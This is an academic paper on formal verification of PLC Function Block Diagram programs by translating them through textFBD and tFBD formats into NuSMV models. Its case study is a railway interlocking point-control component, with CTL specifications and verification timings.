A typical PLC organization is represented in Fig. 1. Input and output modules are used to transmit data between the PLC and connected peripherals. The CPU is the part of a programmable controller responsible for reading inputs, executing the control program, and updating outputs. The focus of a PLC is to repeat periodically the execution of a control program. There are three main phases of this cyclic behavior of a PLC: read data from inputs (sensors), execute the control program, and write data to outputs (actuators).

B. PLC Programming Languages

The program organization units proposed in IEC 61131-3 can be delivered by the manufacturer or programmed by the user according to the rules defined in this standard. In this work, the software Step7 is used. This is the current software version for programming the PLC family SIMATIC S7 of the manufacturer Siemens AG [11]. The FBD programming language [12] is a restricted graphical representation of the machine-oriented language IL. This means that not all IL programs can be represented in FBD, but on the other hand each FBD program can be mapped to IL.
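The three-phase scan cycle described above can be sketched in a few lines of Python. This is a toy illustration with invented sensor/actuator names ("start", "stop", "motor"), not vendor code:

```python
# A toy sketch of the cyclic PLC execution model: read inputs, execute
# the control program, write outputs, repeat.

def control_program(inputs, state):
    """One scan of a trivial control program: run the motor while
    'start' is pressed and 'stop' is not."""
    return {"motor": inputs["start"] and not inputs["stop"]}

def plc_scan(read_inputs, program, write_outputs, cycles):
    """Repeat the three phases of a PLC cycle a fixed number of times."""
    state = {}                             # memory retained between cycles
    outputs = {}
    for _ in range(cycles):
        image = read_inputs()              # phase 1: latch the input image
        outputs = program(image, state)    # phase 2: execute the logic
        write_outputs(outputs)             # phase 3: drive the actuators
    return outputs

# Usage: simulate two scan cycles with fixed sensor values.
log = []
out = plc_scan(lambda: {"start": True, "stop": False},
               control_program, log.append, cycles=2)
```

Note that the inputs are latched once per cycle, so the control program always sees a consistent input image, which is the property the verification model later relies on.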
FBD programs are similar to circuit diagrams in electrical engineering and consist of simple elements. For example, in Fig. 3 the following elements can be found: CMP ==I (comparison of two integers), & (conjunction of two Booleans), >=1 (disjunction of two Booleans), and = (assignment of a value to a variable).

III. THEORETICAL BACKGROUND

With processors getting more and more powerful, and memories growing bigger and bigger, verification becomes feasible for more and more complex programs. The verification methods at hand, in particular model checking, turn out to work quite well for our application area. As a tool, we use NuSMV (a New Symbolic Model Verifier). NuSMV was developed by IRST (Istituto per la Ricerca Scientifica e Tecnologica) and CMU (Carnegie Mellon University) [13]. It is a reimplementation and extension of SMV, the first model checker based on BDDs. There is no standardized process yet to verify PLCs. In this section, we present a verification process for PLC software written in FBD. There are essentially three steps:

A. in order to make FBD programs processable by NuSMV, graphical FBD programs are translated into textual textFBD programs;
B. connections between two graphical FBD elements are represented in the textFBD file by a special type of variables - circuit variables. In order to avoid circuit variables in the NuSMV state space, textFBD programs are translated into tFBD programs;
C. a tFBD program can then be easily represented by a NuSMV program.

In Fig. 3, the process is shown by means of an example which we will also use later on.

A. From FBD to textFBD

We present the FBD components and their corresponding textFBD statements along with their informal semantics. Then we indicate their formal operational semantics and mention how isomorphism of FBD and textFBD semantics can be proved, referring to [14] for the details.

1) FBD and textFBD syntax: In the textFBD format of an FBD program, each graphical FBD operator is given a textual representation.
We give an overview of the FBD elements and their representations in textFBD.

Bit operations: Logical AND, OR and Exclusive-OR operations are represented in textFBD by Out = (In1 op In2), where op is &, | or XOR. The AND and OR operations may have more than two inputs, giving rise to corresponding textFBD constructs like Out = ((In1 & In2) & ... & Inn). The instruction negate binary input negates the input of an FBD operator; this is represented in textFBD by !In. The FBD assignment of an input to an operand is simply represented by Operand = In. Among the bit operations, there are also reset output (R) and set output (S). If the input value of the R operator is true, then the operand is set to false. If the input value is false, then the operand is unchanged. As for the operator S, the operand is set only if its input value is true. A more precise semantics of the operators is given in [14]. Here we focus on their syntax. The operators are represented in textFBD by R(Operand, In) and S(Operand, In).

[Figure 2. Model checking FBD programs: FBD (IL format) -> textFBD format -> tFBD format (substitution, using the list of operators with local variables) -> NuSMV model (with variable description, interface description, table of test cases and CTL specification) -> model checking: satisfied / not satisfied + counterexample]

By means of the N operator, negative edge detection (1 -> 0), the signal state at the input is compared with that in the operand (the edge memory bit). If the input is false and the operand has stored true in the previous cycle, then a negative edge is recognized. In this case, the output is set to true, and to false otherwise. The other way around, the P operator, positive edge detection (0 -> 1), recognizes a rising edge.
These operators are represented in textFBD by Out = N(Operand, In) and Out = P(Operand, In).

Comparators: For comparing two input values, the following comparison operators may be used: equal (==), unequal (<>), greater (>), greater or equal (>=), less (<), less or equal (<=). For instance, the operator CMP ==I, which tests whether two inputs are equal, is represented in textFBD by Out = (In1 == In2).

Jumps: Jump operations can be separated into conditional jumps and absolute jumps. Depending on the input value true or false, a conditional jump can be expressed by JMP or JMPN, respectively. The effect is to set the program counter to the position marked by Label if the In condition is true (JMP) or the In condition is false (JMPN), respectively. In textFBD, this is represented by JMP(In, Label) and JMPN(In, Label). An absolute jump corresponds to a goto statement and is simply represented by JMP(true, Label).

Integer math instructions: Addition, subtraction or multiplication of two integers is represented in textFBD by op(Out, In1, In2), where op is ADD_I, SUB_I or MUL_I.

Move: The MOVE operator copies the value at the input to the output: Out = In.

For generating the textFBD file, the concept of a circuit variable is very important. These variables are generated when connections between two operands are to be represented. The circuit variables are marked as _Li variables (cf. Fig. 3). Fig. 3 gives an impression of the translation from FBD to textFBD.

2) FBD and textFBD semantics: Let h: FBD -> textFBD be a map sending each FBD element e to its corresponding textFBD representation a = h(e). The order of executing FBD operators in a network is determined by a mapping next: 2^FBD -> FBD determining which element is executed next, depending on the set of elements already executed. In textFBD, this role is taken by the program counter, which can be defined as a mapping p: textFBD -> IN, mapping each statement a to its line number pc in the program.
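The informal semantics of the set/reset and edge-detection operators just described can be captured in a small Python sketch. The function names mirror the textFBD operators, but the encoding is ours; operands and edge memory bits are passed and returned explicitly because Python has no PLC-style memory bits:

```python
def R(operand, inp):
    """Reset output: operand becomes False when the input is True,
    otherwise it is unchanged."""
    return False if inp else operand

def S(operand, inp):
    """Set output: operand becomes True when the input is True,
    otherwise it is unchanged."""
    return True if inp else operand

def N(edge_mem, inp):
    """Negative edge detection (1 -> 0): output is True iff the edge
    memory bit stored True in the previous cycle and the input is now
    False. Returns (output, updated edge memory bit)."""
    return (edge_mem and not inp), inp

def P(edge_mem, inp):
    """Positive edge detection (0 -> 1): output is True iff the input
    rose since the previous cycle."""
    return (inp and not edge_mem), inp

# A falling edge over two consecutive cycles:
mem = True                 # the operand stored True in the previous cycle
out1, mem = N(mem, False)  # input falls: negative edge recognized
out2, mem = N(mem, False)  # input stays low: no edge
```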
[Figure 3. From FBD to NuSMV. The example network (CMP ==I comparing int1 with 20, two & blocks over bool1/bool2 and bool3/bool4, a >=1 block, and assignments to result1 and result2) in the three formats:

textFBD:
  _L1 = (int1 == 20);
  _L2 = ((bool1 & bool2) & _L1);
  _L3 = (bool3 & bool4);
  _L4 = (_L2 | _L3);
  result1 = _L4;
  result2 = _L4;

tFBD:
  result1 = (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4));
  result2 = (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4));

NuSMV:
  MODULE main
  VAR
    pc : 1..2;
    zyklus : 1..3;
    result1 : boolean;
    result2 : boolean;
  DEFINE
    MAX_pc := 2;
    MAX_zyklus := 3;
    bool1 := true; bool2 := true; bool3 := false; bool4 := true;
    int1 := 20;
  ASSIGN
    init(pc) := 1;
    init(zyklus) := 1;
    init(result1) := false;
    init(result2) := false;
    next(result1) := case
      pc = 1 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4));
      1 : result1;
    esac;
    next(result2) := case
      pc = 2 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4));
      1 : result2;
    esac;
    next(zyklus) := case
      pc = 2 : case (zyklus + 1) <= MAX_zyklus : zyklus + 1; 1 : zyklus; esac;
      1 : zyklus;
    esac;
    next(pc) := case
      pc + 1 <= MAX_pc : pc + 1;
      pc = 2 : 1;
      1 : pc;
    esac;]

An FBD network N may be given a transition system T = (C, c0, ->) as operational semantics, where C is the set of FBD configurations of N, c0 is the start configuration, and -> is the next-configuration relationship. An FBD configuration is a triple c = (s, e, E) where s is a state of the program variables, e is the element in the network N to be executed next, and E is the set of elements in N not yet executed. Correspondingly, a textFBD program P may be given a transition system S = (D, d0, |->) as operational semantics, where D is the set of textFBD configurations, d0 is the start configuration, and |-> is the next-configuration relationship. A textFBD configuration is a triple d = (s, a, pc) where s is as above, a is the textFBD statement to be executed next, and pc is the program line in which a occurs.
For the details of how these transition systems are defined, we refer to [14]. There it is also shown that there is a bijective mapping h: C -> D with the property that h(c0) = d0 and c -> c' iff h(c) |-> h(c'). Thus, an FBD network and its corresponding textFBD program have isomorphic operational semantics, so they are equivalent in a strong sense.

B. From textFBD to tFBD

The new tFBD format has the advantage that some circuit variables are avoided, thus reducing the state space for model checking dramatically. A textFBD line in which a new circuit variable is created may be omitted in tFBD under certain circumstances. Then, in each other line of the textFBD program where this circuit variable is used, it may be substituted by the corresponding expression. The process is illustrated in Fig. 3.

[Figure 4. Substitution of circuit variables: the textFBD configurations d1, ..., dk, in which circuit variables _L1, ..., _Lk-1 are assigned step by step, correspond to the tFBD configurations d'1, d'2, in which the defining expressions f(x) and g(x) appear substituted directly into the operators.]

To be more precise, textFBD programs are transformed to tFBD programs in the following way: each textFBD assignment _Li = fi(x) of an expression fi(x), where x is a sequence of arguments, to a circuit variable _Li is omitted. Instead, each occurrence of _Li in right-hand sides of other textFBD statements is substituted by fi(x).
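The substitution rule just stated can be sketched in Python on the running example of Fig. 3. Representing each textFBD statement as a (target, expression) pair of strings is our own encoding, and the naive string replacement is only adequate for this small example:

```python
# Sketch of the textFBD -> tFBD transformation: every assignment to a
# circuit variable (_L1, _L2, ...) is omitted, and each later occurrence
# of that variable is replaced by its defining expression.

def to_tfbd(statements):
    defs = {}                              # circuit variable -> expression
    tfbd = []
    for target, expr in statements:
        for var, rhs in defs.items():      # substitute known circuit vars
            expr = expr.replace(var, rhs)  # naive; fine for this example
        if target.startswith("_L"):        # circuit variable: record, omit
            defs[target] = expr
        else:                              # ordinary variable: keep line
            tfbd.append((target, expr))
    return tfbd

textfbd = [
    ("_L1", "(int1 == 20)"),
    ("_L2", "((bool1 & bool2) & _L1)"),
    ("_L3", "(bool3 & bool4)"),
    ("_L4", "(_L2 | _L3)"),
    ("result1", "_L4"),
    ("result2", "_L4"),
]
tfbd = to_tfbd(textfbd)
# Only the two result assignments survive, each carrying the fully
# substituted expression from Fig. 3; no _Li variable remains.
```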
Similar to a textFBD program, a tFBD program can be given an operational semantics in the form of a transition system S' = (D', d'0, |->'), where D' is the set of configurations, d'0 is the start state, and |->' is the next-state transition relationship. We refer to [14] for details. The behaviour of textFBD and tFBD transition systems with respect to circuit variables is illustrated in Fig. 4. Clearly, since variables are eliminated, there can be no bijection between the state spaces and thus no isomorphism. Reducing the state space was precisely the motivation for introducing the transformation of textFBD to tFBD. But still, the operational semantics of textFBD and tFBD can be equivalent, albeit in the weaker sense of observational equivalence: they can be strongly bisimilar. Let S = (D, d0, |->) be a textFBD transition system and S' = (D', d'0, |->') the corresponding tFBD transition system. S and S' are strongly bisimilar (S ~ S') iff there is a relationship B over D x D' which is a strong bisimulation for (d0, d'0). That means: (d0, d'0) is in B, and for all (d, d') in B we have:

  d |-> g in D implies there is a g' in D' with d' |->' g' and (g, g') in B;
  d' |->' g' in D' implies there is a g in D with d |-> g and (g, g') in B.

Fig. 4 shows the corresponding system states before and after substituting circuit variables. The following example shows that there is a problem.

Example 1. (Comparing FBD, textFBD and tFBD) Let x and y be two Boolean variables which are combined by conjunction. If the result is true, then x is set to false by the R operator. The same happens with y. If x and y are true in the beginning, tFBD does not yield the expected result (cf. Fig. 5).

[Figure 5. Example: FBD, textFBD and tFBD synopsis. Starting from x = true, y = true: textFBD executes _L1 = x & y; R(x, _L1); R(y, _L1) and ends with x = false, y = false, whereas tFBD executes R(x, (x & y)); R(y, (x & y)) and ends with x = false, y = true.]

The problem is solved by restricting the use of variables appropriately, forbidding situations where a circuit variable may not be substituted: 1) if an operator with local variables is to be assigned to the circuit variable; 2) if the circuit variable is used as an operand in an operator with local variables. With this restriction, strong bisimilarity between the textFBD and tFBD operational semantics can be shown [14].

Example 2. (Strong bisimulation) Strong bisimulation for the example in Fig. 4 works as follows:
B = {(d1, d'1), ..., (di, d'1), ..., (dj-1, d'1), (dj, d'1), (dj+1, d'2), ..., (dk-1, d'2), (dk, d'2)}

C. From tFBD to NuSMV

The main program is shown in MODULE main (cf. Fig. 3). The module may have several sections. For our FBD modeling, the VAR, DEFINE, ASSIGN and SPEC sections are used: the VAR section for variable declarations; the DEFINE section for defining symbols for frequently used expressions; the ASSIGN section for describing assignments; and the SPEC section for specifying CTL specifications to be checked in the model. For an example, cf. Fig. 3. For more detail, cf. [14]. A possible program property to be checked may look like this: at the end of the first cycle, the variables x1, ..., xn should have the values a1, ..., an. Specifications for a NuSMV model can be written in CTL (Computation Tree Logic), LTL (Linear Time Logic) or PSL (Property Specification Language). For example, for specifying the above property in CTL, we have to write CTLSPEC in front of the formula. The property given above then looks as follows:

CTLSPEC AG((cycle = 1 & pc = MAX_pc) -> ((x1 = a1) & ... & (xn = an)))

where the program cycle is determined by the integer variable cycle. A more extended case study is given in the next section.
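The discrepancy of Example 1 can be replayed concretely. The straight-line Python below is our stand-in for one scan cycle, with the R operator encoded as described earlier in this section:

```python
def R(operand, inp):
    """Reset: operand becomes False when the input is True."""
    return False if inp else operand

# textFBD: the circuit variable latches x & y before either reset fires.
x = y = True
_L1 = x and y          # _L1 == True, evaluated exactly once
x = R(x, _L1)          # x -> False
y = R(y, _L1)          # y -> False (uses the latched value)

# tFBD with unrestricted substitution: the second reset re-evaluates
# x & y after x has already been cleared, so y keeps its value.
x2 = y2 = True
x2 = R(x2, x2 and y2)  # x2 and y2 is True, so x2 -> False
y2 = R(y2, x2 and y2)  # x2 and y2 is now False, so y2 stays True
```

The two encodings disagree on y, which is exactly the situation the substitution restrictions above rule out.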
The NuSMV user has the choice between a modular and a flat representation of functions. In modular representation, each function is given a separate module. The advantage is that modeling of FBD programs is rather straightforward. The disadvantage is that with each instantiation of a module, the state space grows very rapidly. In flat representation, all functions are specified in one module, so that the state space remains constant when running the model checker. Indeed, this can be quite efficient. The disadvantage is that the functions have to be (re)modeled by hand, an effort that may only be feasible for small systems. Summing up, the process given above yields isomorphic transformations in the first two steps, and a strongly bisimilar transformation in the third step. This way, model checking PLC software written in FBD becomes feasible in practice. This is demonstrated in the next section.

IV. CASE STUDY

Here we describe how the method is applied in the area of railway automation. We concentrate on FBD software as it is used by one family of PLC-based interlocking systems. Interlocking systems are railway facilities which are used for the central control of points and signals (cf. [15]). They have outdoor and indoor parts. The indoor parts consist of hardware and software. The interlocking software is composed of several components which are responsible for controlling the various interlocking functions. One such component is a point. Like the other components, it consists of several code modules. These code modules depend on the equipment, but each one is designed for only one point. One function block diagram in such a code module of a point component is responsible for controlling the point. This function block diagram is used here as a use case for demonstrating the verification method proposed in this paper. From this module, the corresponding NuSMV model is created using our method.
The model is presented below.

Table I. Example of a test case: moving the frog of a point left

Description                                         | Precondition                        | Expected reaction
From a right position, the left direction relay is  | ModuleIF = Right, ComIF = ReposCom  | ModuleIF = Left+S1
activated by means of a reposition command, and the |                                     |
reposition process is activated                     |                                     |
After at least 20 ms, the position relay is         | =>, iTime = 20                      | ModuleIF = S2
activated                                           |                                     |
After at least 30 ms, protection is activated       | =>, iTime = 30                      | ModuleIF = S3
After at least 40 ms, the frog starts to move       | =>, iTime = 40                      | ModuleIF = S4

We start with describing the test cases, taken from practice, which are used for checking the correctness of the software. The test cases form the basis for constructing the verification scenarios.

A. Test case description

In Table I we give a simplified description of a test case of the code module for point control. The activation of the point actuator component is checked in four steps before moving the point blade. Each step is represented by a description, a definition of preconditions (the start configuration of the test case), and a definition of the expected reaction. For a better understanding of Table I, we explain the concept of a variable domain in more detail. In the description of preconditions and expected reactions of a test case, we not only use program variables like iTime, but also variable domains like ModuleIF or ComIF. A variable domain contains a description of several program variables. This can best be explained using the variable domain ModuleIF as an example. It is defined in Table II. The following variables belong to this domain: bPointPosition, bDirectionRight, bDirectionLeft, bRepetition, bRepositionActive, bPointPositionRelays, bProtection and iTime. If ModuleIF has the value Right, then bPointPosition = 1, bDirectionRight = 1 and bDirectionLeft = 0. Variable domains are used in the description of interfaces.
As shown in Table II, the module interface is described by the variable domain ModuleIF and the variables bPointPosition, bDirectionRight, bDirectionLeft, etc. A variable domain contains different variable assignments in different test cases. In order to enable a clear test case description, all variable assignments are listed for each variable domain. For example, the variable assignments for ModuleIF are defined by ModuleIF in {Left, Right, S1, S2, S3, S4, ...}. Thus, the precondition in the first step of the test case is represented by ModuleIF = Right, expressing that the direction relay should be in the right position. This means that, before executing the test case, we must have bPointPosition = 1, bDirectionRight = 1 and bDirectionLeft = 0 (cf. Table II).

Table II. Definition of interfaces - variable domains

ModuleIF - Module Interface (domain values: Left, Right, S1, S2, S3, S4)
  bPointPosition: 0 1
  bDirectionRight: 0 1
  bDirectionLeft: 1 0
  bRepetition: 1 0
  bRepositionActive: 1
  bPointPositionRelays: 1 0
  bProtection: 1 0
  iTime: 0

ComIF - Command Interface (domain value: ReposCom)
  bComActive: 1
  bFunction: 1
  iElement: 100

Similarly, at the beginning of the test case, ComIF is defined as ReposCom. If an interface is not specified in the precondition of a test case, it assumes its initial value, which should be defined at the beginning of the test table. When describing the preconditions of the 2nd, 3rd and 4th steps of the test case, we have the symbol combination =>. This means that the test case is based on the previous step. For instance, in the 2nd step, all variables except for iTime have their values from the expected outcome of the 1st step. The latter is described by ModuleIF = Left+S1. That means that bPointPosition = 0, bDirectionRight = 0, bDirectionLeft = 1, bRepetition = 1 and bRepositionActive = 1.
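The expansion of domain values into concrete variable assignments, including symbolic sums such as Left+S1, can be sketched as follows. The dictionary encoding is ours, and the split of the Table II assignments between Left and S1 is inferred from the expansion of Left+S1 given in the text:

```python
# Partial encoding of the ModuleIF variable domain (values from Table II;
# assignments for S1 inferred from the Left+S1 expansion in the text).
MODULE_IF = {
    "Left":  {"bPointPosition": 0, "bDirectionRight": 0, "bDirectionLeft": 1},
    "Right": {"bPointPosition": 1, "bDirectionRight": 1, "bDirectionLeft": 0},
    "S1":    {"bRepetition": 1, "bRepositionActive": 1},
}

def expand(domain, value):
    """Expand a (possibly summed) domain value into variable assignments.
    In a sum like 'Left+S1', later parts override earlier ones, i.e. a
    variable takes the value of its last occurrence."""
    assignment = {}
    for part in value.split("+"):
        assignment.update(domain[part])
    return assignment

precondition = expand(MODULE_IF, "Right")
reaction = expand(MODULE_IF, "Left+S1")
```

The last-occurrence rule also reproduces the Left+Right case mentioned in the text, where bPointPosition receives the value 1 from Right.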
When adding two or more values of a variable domain symbolically, it is possible that a variable occurs in the description of both (or all) elements of the sum. In this case, the variable is assigned the value of its last occurrence. For instance, bPointPosition is given the value 1 in Left+Right. When describing the preconditions of a test case, we may also assign values to single variables instead of value domains. For instance, the variable iTime is assigned different values in the 2nd, 3rd and 4th steps of the test case. The same holds when describing the expected reaction.

B. NuSMV Component Model

An extract of the NuSMV model of the point component is shown in Table III. We show only lines from the tFBD model in which the following program variables change: bPointPosition, bDirectionRight, bDirectionLeft, bRepositionActive, bRepetition, bComActive, bFunction, iElement. These are the variables which are used in the specification. The variables having no role in our context are denoted by var1, var2, etc. in Table III. In the model description as well as in the specification, the data are represented in a changed format in order to hide the reference to the original software. The rules for transforming FBD programs into the NuSMV input language are described above in Section III. In this section, we show how to represent specifications as logical formulae.

C. Description of verification scenarios

In the case study, verification scenarios are described in CTL. Two parameters are important: 1) the program counter pc, which assumes the value MAX_pc at the end of a program cycle and is then set to 1 again; 2) the cycle counter cycle. As said before, the test case descriptions of the component serve as the basis for formulating the verification scenarios. Since a test case is defined by a precondition and an expected reaction, we may represent this by the following scenario.
ModuleIF = Right & ComIF = ReposCom =>                                  (1)
    AG((cycle = 1 & pc = MAX_pc) -> ModuleIF = Left+S1)

Bearing in mind the interface description in Table II, the first step of the scenario may be represented by the following formula:

((bPointPosition = 1 & bDirectionRight = 1 & bDirectionLeft = 0) &      (2)
 (bComActive = 1 & bFunction = 1 & iElement = 100)) =>
    AG((cycle = 1 & pc = MAX_pc) ->
       (bPointPosition = 0 & bDirectionRight = 0 & bDirectionLeft = 1 &
        bRepetition = 1 & bRepositionActive = 1))

The remaining three formulae are created in a similar way. As mentioned before, the symbol combination => says that the precondition of the current step has to be extended with the expected reaction of the previous step. For the 2nd step, we thus have

(ModuleIF = Left+S1 & iTime = 20) =>                                    (3)
    AG((cycle = 1 & pc = MAX_pc) -> ModuleIF = S2)

Alternative representation of the specification: If only one formula is to be checked, we may take the variable assignments from the precondition and define their values as initial values of the model variables. Then a scenario may be described by the following formula:

AG((cycle = 1 & pc = MAX_pc) -> expected reaction)                      (4)

With this approach, we build a slightly different NuSMV model where the set of initial states in the model is reduced. As an example, Table III shows the part of the model which refers to some of the variables of our accompanying test case. There the initial values of the variables bPointPosition, bDirectionRight and bDirectionLeft are defined using the init clause. In contrast, the variables bComActive, bFunction and iElement are defined in the DEFINE section because their values are unchanged in the model.

Table III. NuSMV model of the point component

tFBD (excerpt):
   48  R(bRepositionActive, (var10 | var11 | var12));
   50  R(bRepositionActive, ((((var13 & !var14) & (var15 & !var16)) | var17) | var18));
   52  R(bRepositionActive, ((var13 & !var14) & (var19 > var20)));
   88  bPointPosition = var1;
   96  bRepositionActive = ((var21 & !var22) | ((!var21 & !var23) | var24));
  104  bDirectionRight = bPointPosition;
  105  bDirectionLeft = !var2;
  120  S(bPointPosition, var2);
  122  S(bRepetition, var3);
  123  R(bRepetition, ((var4 & !var5) | ((var6 & !var7) & var8) | ((var7 & !var6) & var9)));
  131  R(bPointPosition, var2);

NuSMV (excerpt):
  DEFINE
    bComActive := 1;
    bFunction := 1;
    iElement := 100;
  ASSIGN
    init(bPointPosition) := 1;
    next(bPointPosition) := case
      pc = 88 : var1;
      pc = 120 & var2 : 1;
      pc = 131 & var2 : 0;
      1 : bPointPosition;
    esac;
    init(bDirectionRight) := 1;
    next(bDirectionRight) := case
      pc = 104 : bPointPosition;
      1 : bDirectionRight;
    esac;
    init(bDirectionLeft) := 0;
    next(bDirectionLeft) := case
      pc = 105 : !var2;
      1 : bDirectionLeft;
    esac;
    init(bRepetition) := 0;
    next(bRepetition) := case
      pc = 122 & var3 : 1;
      pc = 123 & ((var4 & !var5) | (((var6 & !var7) & var8) | ((var7 & !var6) & var9))) : 0;
      1 : bRepetition;
    esac;
    next(bRepositionActive) := case
      pc = 48 & (var10 | var11 | var12) : 0;
      pc = 50 & ((((var13 & !var14) & (var15 & !var16)) | var17) | var18) : 0;
      pc = 52 & ((var13 & !var14) & (var19 > var20)) : 0;
      pc = 96 : ((var21 & !var22) | ((!var21 & !var23) | var24));
      1 : bRepositionActive;
    esac;

D. Verification results

The textFBD format of the software component under consideration has 165 lines of code. It uses about 100 variables (90 Boolean and 10 integer). The model verification was performed on a computer with an Intel(R) Xeon(R) 5150 CPU at 2.66 GHz and 3.25 GB RAM. A detailed description of the NuSMV model checker may be found in [16] and [17]. Its most important properties are summarized in [13]. The basic steps of NuSMV verification work as follows.
1) in the first step, the model is read; an internal hierarchic representation is set up and stored;
2) in the second step, the hierarchic representation is transformed into a flattened representation; it contains only one module in which all modules and processes are instantiated;
3) then the BDD variables are generated;
4) the flattened model is represented using BDDs;
5) after generating the BDD representation, the CTL specifications can be checked.

The execution of the first three steps took about 1 second. The execution times for the other two steps differed depending on which of the variants explained above was used.

One model for all scenarios: Formulae (1), (2) and (3) describe how the specification for the first variant of the NuSMV model is constructed. The initial values of the variables in question are not defined in the model. Of about 10^65 states, about 10^14 states were reachable. Setting up the BDD-based model took slightly more than half an hour. Checking the specifications took 30 to 80 seconds per formula.

One model for one scenario: In the second case, a model is generated for each scenario. The preconditions for the scenario are initialized in the model. The specification is given in the form of formula (4). In the NuSMV model, about 6000 of the 10^60 states were reachable. Setting up the BDD-based model took about 40 minutes. Checking the specification then took less than 1 second.

V. AUTOMATION OF THE VERIFICATION METHOD

As mentioned before, the CTL specification is set up using the descriptions of the test case and the module interfaces (cf. Fig. 2). CTL formulae are easily constructed by combining information from the tables, but this must be done by hand. Creating the NuSMV model, however, is a little more complicated, but it can be automated. With the method described here, an arbitrary FBD program is modeled in a way that makes it possible to verify it with the NuSMV model checker.
As mentioned above in Section III, we propose to first construct the textFBD model, then the tFBD model, and then the NuSMV model. In what follows, we give a more detailed description of this process.

Table IV. Excerpt of the grammar

<N-Statement>  ::= ... | <Bitlogic> <BitlogicEnd>                        (1)
<Bitlogic>     ::= ... | A <Operand> <End>                               (2)
                 | A( <End> <Compare> ) <End>                            (3)
                 | <Bitlogic> A <Operand> <End>                          (4)
                 | <Bitlogic> O <End> <Bitlogic>                         (5)
<Compare>      ::= L <Operand> <End> L <Operand> <End> COMPARETOK <End>  (6)
<BitlogicEnd>  ::= ... | <AssignEndN>                                    (7)
<AssignEndN>   ::= = <Var> <End> <AssignEnd>                             (8)
<AssignEnd>    ::= | <AssignEnd> = <Var> <End>                           (9)

[Figure 6. Example: IL and textFBD formats of an FBD program.

IL:                       textFBD:
  A(;                       _L1 = (int1 == 20);
  L int1;                   _L2 = ((bool2 & bool1) & _L1);
  L 20;                     _L3 = (bool4 & bool3);
  ==I;                      _L4 = (_L3 | _L2);
  );                        result1 = _L4;
  A bool1;                  result2 = _L4;
  A bool2;
  O;
  A bool3;
  A bool4;
  = result1;
  = result2;]

A. Constructing the textFBD format

This is the first step in verifying an FBD program. The textFBD representation is generated from the IL representation of the program. IL is a machine-oriented PLC programming language, and each FBD program can be represented in IL. The range of textFBD statements is equivalent to that of FBD statements (cf. [12]). The IL format of an FBD program can be transformed to textFBD using a context-free grammar. An excerpt of it is shown in Table IV. In the table, the transformation rules are shown as they are used for transforming the network in Figure 3. The IL format of the network is shown in Figure 6. The example network may be considered as a complex statement consisting of a logical bit operation followed by two assignments (cf. rule (1) in Table IV). A logical bit operation always has an output.
Since no dangling lines may exist in a network, this output must be consumed in some way. In our case, the logical bit operation ends with assignments (cf. rule (7)). To enable using two such assignments, rules (8) and (9) are needed. Among the logical bit operations, we have a comparison of two integers (rule (6)). If the result of this operation is to be combined with the AND of two further Boolean variables, first rule (3) and then rule (4) must be applied. An AND operation of two Boolean variables can be recognized using rules (2) and (4). Rule (5) describes how two logical bit operations can be combined with an OR operation. The circuit variables in the textFBD file (_Li variables) are generated when connections between two operands are to be represented (cf. Fig. 6). Such a variable is generated when the recognition of an FBD operand is terminated. In our example, this means the following. As soon as the comparison is recognized, _L1 is generated. Then the recognition of the AND operation follows (until the OR operation is read), with the subsequent generation of _L2. In order to execute the OR operation, the subsequent AND operation (_L3) is needed. Only then is _L4 generated as the disjunction of _L2 and _L3. Finally, the result of the logical bit operation in variable _L4 is assigned to the variables result1 and result2. On the basis of the grammar and the circuit variable concept, textFBD files are generated.

B. Constructing the tFBD format

Although the textFBD format of the FBD program could be transformed to NuSMV directly, we first minimize the model in order to minimize the NuSMV state space. As shown in Section III, we may do away with many circuit variables and thus reduce the model size. This substitution is expressed in the tFBD format of the FBD program. For constructing the tFBD format, only the list of FBD operations which use local circuit variables is needed. When transforming a textFBD file, each statement is checked as to whether it uses an operator from the list.
If yes, it is copied into the tFBD file without change. Otherwise, we first substitute the circuit variable (cf. fig. 2).
C. Constructing the NuSMV model
Transforming a tFBD file to the NuSMV input language has been treated above in subsection III-C. We have shown how to represent tFBD statements by NuSMV transformation rules. In order to complete a NuSMV model, the variable declarations have to be added (cf. fig. 2).
VI. CONCLUSION
In this paper, we present a method for the automated formal verification of PLC software. In particular, we look at FBD software. In order to verify the software, we propose to represent the graphical PLC programming language textually in two observationally equivalent ways: textFBD and tFBD. From the latter format, we derive a NuSMV model. Its state space is dramatically smaller than that of a NuSMV model directly derived from textFBD, so that applications of practical size can be model checked. The method was put to the test in the area of railway automation. In a case study, a component of an interlocking software, the logic controlling a point, was verified. The design of the model as well as the construction of the NuSMV model were automated. With this successful project, we are confident to pave the way for applying the method in practice. There are two important aspects in applying formal verification in practice: 1) the method should be applicable to relatively big and realistic models; 2) the execution times should be acceptable. The first point is satisfied by our method because the case study is directly taken from practice, without any omissions or abstractions which would make it more "academic". As for the second point, the execution times for setting up and transforming the model and verifying the specifications are acceptable.
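The substitution step can be sketched roughly as follows. The statement representation, the operator keep-list, and the string-based inlining are all assumptions made for illustration; the paper only specifies that circuit variables are eliminated unless their defining operation is on the list:

```python
# Hypothetical keep-list: operations whose circuit variables must survive
# (e.g. stateful blocks such as timers/counters -- assumed for illustration).
KEEP_OPERATORS = {"TON", "CTU"}

def to_tfbd(statements):
    """statements: list of (target, operator, expression_text) triples.
    Inlines each circuit variable (_L...) into the expressions that use it,
    unless its defining operator is on the keep-list."""
    definitions = {}   # circuit variable -> its (already expanded) expression
    out = []
    for target, op, expr in statements:
        # substitute previously collected circuit variables into this expression
        for var, sub in definitions.items():
            expr = expr.replace(var, "(" + sub + ")")
        if target.startswith("_L") and op not in KEEP_OPERATORS:
            definitions[target] = expr      # inline later instead of emitting
        else:
            out.append((target, expr))
    return out

stmts = [("_L1", "==", "int1 == 20"),
         ("_L2", "&", "bool2 & bool1 & _L1"),
         ("result1", ":=", "_L2")]
print(to_tfbd(stmts))
```

In this toy run only the final assignment survives; both circuit variables disappear into one expression, which is the state-space reduction the tFBD format is after. (A real implementation would work on parsed statements rather than raw string replacement.)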
It is true that they are greater than what simulations would take. But there is a fundamental difference between simulation and verification, where the entire state space is being explored. Our realistic case study is an important step to convince not only railway engineers that automated formal methods are practical. The next step in applying our methods should be a state-based specification. This way, the advantage of our method would become even more evident.
Summary:
